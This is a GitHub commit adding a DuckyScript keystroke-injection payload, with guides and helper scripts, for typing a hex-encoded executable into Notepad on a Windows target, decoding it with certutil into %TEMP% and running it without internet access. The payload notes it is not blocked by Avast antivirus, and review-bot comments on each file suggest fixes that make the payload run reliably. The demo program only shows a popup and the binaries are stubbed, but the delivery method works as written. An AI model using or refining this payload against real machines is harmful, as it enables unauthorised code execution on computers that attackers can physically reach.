Merge pull request #347 from aleff-github/patch-64

Install And Run Any Arbitrary Executable - No Internet And Root Needed
Dallas Winger 2024-01-08 02:24:00 -05:00 committed by GitHub
commit bf2dfb7c17
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
6 changed files with 270 additions and 0 deletions

View File

@ -0,0 +1,125 @@
# Install And Run Any Arbitrary Executable - No Internet And Root Needed
Through this guide you will be able to create executable programs that can be installed via DuckyScript in such a way as to avoid using the Internet altogether. This type of installation can lead to serious damage to machines so do it only if you are fully aware and sure of what you are doing, in this example you will already find the code in hexadecimal but if you want to be sure recompile the executable following the following guide.
Executables have been removed for security reasons.
**Category**: Execution
# Guide to Creating an Executable Program using Python
## Introduction
This guide provides detailed instructions on how to use Python to create an executable program, generate hexadecimal code, and automate the execution of the application trough DuckyScript. Practical example in assets directory.
## Creating the Python Program
To begin, create a Python program that performs the desired functionality. You can use any programming language of your choice, but for this guide, we'll be using Python.
```python
import ctypes
ctypes.windll.user32.MessageBoxW(None, "Hello Hak5!", 'Info', 0x10 | 0x1)
```
## Creating the Executable using PyInstaller
Once the Python program is ready, we can use PyInstaller to create an executable file. PyInstaller converts the Python program into a standalone executable that can be run on any compatible system without requiring Python to be installed.
Install PyInstaller using the following command:
```powershell
pip install pyinstaller
```
To create the executable, run the following command in the terminal:
```powershell
pyinstaller --onefile full/path/to/the/file/example.py
```
Replace `example.py` with the filename of your Python script. The `--onefile` flag ensures that the output is a single executable file. Remember that the executable file can be found within the path `dist/example.exe`.
## Generating Hexadecimal Code
Next, we'll generate the hexadecimal code from the executable file. This step is necessary if you intend to automate the execution of the program.
To generate the `hexadecimal` code, you can use various methods or libraries. In this case I decided to create another program in Python capable of doing this conversion, the partial code is as follows but you can find the entire file in the assets folder.
```python
# Rest of the code...
with open(filename, 'rb') as file:
binary_data = file.read()
hex_code = binascii.hexlify(binary_data).decode()
# ...
```
## Creating a DuckyScript to Automate Execution
To create the payload in DuckyScript you simply add the hexadecimal code inside a STRING command immediately after opening the notepad.
```duckyscript
DEFINE #HEX_CODE <hexadecimal_code>
DELAY 500
GUI r
DELAY 500
STRING notepad.exe
ENTER
DELAY 500
STRING #HEX_CODE
DELAY 2000
ALT F
DELAY 1000
STRING S
DELAY 1000
ALTSTRING "%TEMP%\script.hex"
```
Replace `<hexadecimal_code>` with the actual hexadecimal code generated in the previous step. I used a combo ALT F and STRING S for save the file using `"%TEMP%\script.hex"` that save it in a `TEMP` directory
## Decoding Hexadecimal Code and Executing the Program
Now, we need to decode the hexadecimal code and execute the program. We can use the `certutil` command to accomplish this.
Once saved the file with a hex extension, run the following command in the Command Prompt:
```powershell
certutil -f -decodeHex "%TEMP%\script.hex" "%TEMP%\script.exe"
```
Replace `script.exe` with the desired output filename for the decoded program.
Finally, run the executable on the computer, or any other compatible device, to open start execution of the program.
These are the steps required to create an executable program with Python, generate the hexadecimal code, and automate its execution. Feel free to modify the instructions to suit your specific needs or programming language preferences.
Happy Hacking!
## Credits
<h2 align="center"> Aleff :octocat: </h2>
<div align=center>
<table>
<tr>
<td align="center" width="96">
<a href="https://github.com/aleff-github">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/github.png?raw=true width="48" height="48" />
</a>
<br>Github
</td>
<td align="center" width="96">
<a href="https://www.instagram.com/alessandro_greco_aka_aleff/">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/instagram.png?raw=true width="48" height="48" />
</a>
<br>Instagram
</td>
<td align="center" width="96">
<a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
</a>
<br>Discord
</td>
</tr>
</table>
</div>
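Review bot: the DuckyScript snippet in this README disagrees with payload.txt in the same change: it saves the file with `ALTSTRING "%TEMP%\script.hex"` where payload.txt uses `STRINGLN "%TEMP%\example.hex"`, and the certutil step decodes to `"%TEMP%\script.exe"` while the payload decodes to `example.exe`; settle on one filename and one keystroke command so a reader who copies from the README gets the behaviour of the shipped payload. The README also never states the practical limit of the technique: `STRING #HEX_CODE` types the entire hex-encoded executable over the keyboard interface, the hex string is twice the byte size of the binary, and a PyInstaller `--onefile` build is typically several megabytes, so typing it at realistic HID rates takes hours; say so, and suggest a small native binary for anyone who wants a run that finishes in minutes. Smaller items: "trough" in the Introduction should be "through", and the third credits cell links to LinkedIn but is labelled "Discord".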

View File

@ -0,0 +1,77 @@
# Example
Executables have been removed for security reasons.
## File list
- Python code: `example.py`
- Convert to hex script: `convert_to_hex.py`
- Executable file compiled using pyinstaller: `dist/example.exe`
- Hexadecimal code output: `example.hex`
- File compiled from hex code using certutil: `example.exe`
## Procedure
- This Python code create a Windows popup.
```python
import ctypes
ctypes.windll.user32.MessageBoxW(None, "Hello Hak5!", 'Info', 0x10 | 0x1)
```
- Create the executable
```powershell
pyinstaller --onefile C:/Users/Aleff/Documents/Install_And_Run_Any_Arbitrary_Executable-No_Internet_Needed/assets/example.py
```
- Create the hex code
```python
import binascii
def convert_to_hex(filename, output_file):
with open(filename, 'rb') as file:
binary_data = file.read()
hex_code = binascii.hexlify(binary_data).decode()
with open(output_file, 'w') as output:
output.write(hex_code)
# Esempio di utilizzo
exe_filename = 'C:/Users/Aleff/Documents/Install_And_Run_Any_Arbitrary_Executable-No_Internet_Needed/assets/dist/example.exe'
output_filename = 'C:/Users/Aleff/Documents/Install_And_Run_Any_Arbitrary_Executable-No_Internet_Needed/assets/example.hex'
convert_to_hex(exe_filename, output_filename)
```
- Create the DuckyScript payload
```duckyscript
GUI r
DELAY 1000
STRINGLN notepad.exe
DELAY 2000
STRING #HEX_CODE
DELAY 2000
ALT F
DELAY 1000
STRING S
DELAY 1000
STRINGLN "%TEMP%\example.hex"
DELAY 1000
ENTER
DELAY 1000
ALT F4
DELAY 2000
GUI r
DELAY 500
STRINGLN certutil -f -decodeHex "%TEMP%\example.hex" "%TEMP%\example.exe"
DELAY 1000
ENTER
DELAY 1000
GUI r
DELAY 250
STRINGLN "%TEMP%\pranhex.exe"
```
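Review bot: the final step runs a file this procedure never creates: the certutil line `STRINGLN certutil -f -decodeHex "%TEMP%\example.hex" "%TEMP%\example.exe"` writes `example.exe`, but the last line is `STRINGLN "%TEMP%\pranhex.exe"`, so the payload as listed here ends with a Run-dialog "cannot find" error; change it to `"%TEMP%\example.exe"` as in payload.txt. This snippet also uses `STRING #HEX_CODE` without the `DEFINE #HEX_CODE` line that the top-level README and payload.txt carry, so it will not compile as shown; include the DEFINE. The "File list" should also say that `dist/example.exe` and `example.hex` are stubs in this commit ("Executables have been removed for security reasons") rather than listing them as if they were usable outputs.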

View File

@ -0,0 +1,15 @@
import binascii
def convert_to_hex(filename, output_file):
with open(filename, 'rb') as file:
binary_data = file.read()
hex_code = binascii.hexlify(binary_data).decode()
with open(output_file, 'w') as output:
output.write(hex_code)
# Esempio di utilizzo
exe_filename = 'C:/Users/Aleff/Documents/GitHub/tmp/TODO Install_And_Run_Any_Arbitrary_Executable-No_Internet_Needed/assets/dist/example.exe'
output_filename = 'C:/Users/Aleff/Documents/GitHub/tmp/TODO Install_And_Run_Any_Arbitrary_Executable-No_Internet_Needed/assets/example.txt'
convert_to_hex(exe_filename, output_filename)
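Review bot: the input and output paths are hardcoded to one developer's machine (`C:/Users/Aleff/Documents/GitHub/tmp/TODO Install_And_Run_...`), and the output is `example.txt` while both READMEs and the payload expect `example.hex`; read the two paths from `sys.argv` (or argparse) and default the output to a `.hex` name so the script is usable as shipped. The comment `# Esempio di utilizzo` is Italian for "Example usage"; keep comments in English for consistency with the rest of this change. Minor: `binascii.hexlify(binary_data).decode()` can be written as `binary_data.hex()`, which drops the `binascii` import.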

View File

@ -0,0 +1 @@
here should be present the hex content
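Review bot: this file is a one-line placeholder, `here should be present the hex content`, yet the assets README lists it as "Hexadecimal code output: `example.hex`" as if it were real output; either mark it as a stub in that README or drop the file, because `certutil -f -decodeHex` cannot decode this text and a reader following the file list will not know why the procedure fails at that step.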

View File

@ -0,0 +1,3 @@
import ctypes
ctypes.windll.user32.MessageBoxW(None, "Hello Hak5!", 'Info', 0x10 | 0x1)
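Review bot: the flags argument `0x10 | 0x1` is opaque; name the MessageBox constants (`MB_OKCANCEL = 0x1`, `MB_ICONERROR = 0x10`) so a reader sees this is an OK/Cancel box with the error icon, and add a one-line comment saying the script exists only as a harmless test payload for the procedure in the README, since it is the file a user will compile and type onto a target.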

View File

@ -0,0 +1,49 @@
REM ###########################################################################################
REM # |
REM # Title : Install And Run Any Arbitrary Executable - No Internet And Root Needed |
REM # Author : Aleff |
REM # Version : 1.0 |
REM # Category : Execution |
REM # Target : Windows 10/11 |
REM # |
REM ###########################################################################################
REM Requirements:
REM - Nothing
REM Define here your hexadecimal code
DEFINE #HEX_CODE example
REM Note:
REM - Tested on Windows 11
REM - Running checked but not blocked by Avast antivirus
GUI r
DELAY 1000
STRINGLN notepad.exe
DELAY 2000
STRING #HEX_CODE
DELAY 2000
ALT F
DELAY 1000
STRING S
DELAY 1000
STRINGLN "%TEMP%\example.hex"
DELAY 1000
ENTER
DELAY 1000
ALT F4
DELAY 2000
GUI r
DELAY 500
STRINGLN certutil -f -decodeHex "%TEMP%\example.hex" "%TEMP%\example.exe"
DELAY 1000
ENTER
DELAY 1000
GUI r
DELAY 250
STRINGLN "%TEMP%\example.exe"
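Review bot: the `ENTER` after `STRINGLN "%TEMP%\example.hex"` is a stray keystroke: STRINGLN already confirms the Save As dialog, so the extra ENTER lands in the editor, marks the document modified, and the `ALT F4` that follows opens a save-changes prompt instead of closing Notepad; the same applies to the `ENTER` after the `STRINGLN certutil ...` line, which is pressed in whatever window has focus after the Run dialog has already executed. Drop both. `REM - Nothing` under Requirements is also not accurate: the payload needs Notepad and certutil.exe on the target (both present on Windows 10/11, but worth listing) and a user who has replaced `DEFINE #HEX_CODE example` with the real hex; as committed, certutil cannot decode the word `example` and the closing `STRINGLN "%TEMP%\example.exe"` runs nothing. A comment next to the DEFINE saying that `STRING #HEX_CODE` types the full hex of the executable over HID, which takes hours for a multi-megabyte binary, would save users a run they abandon halfway.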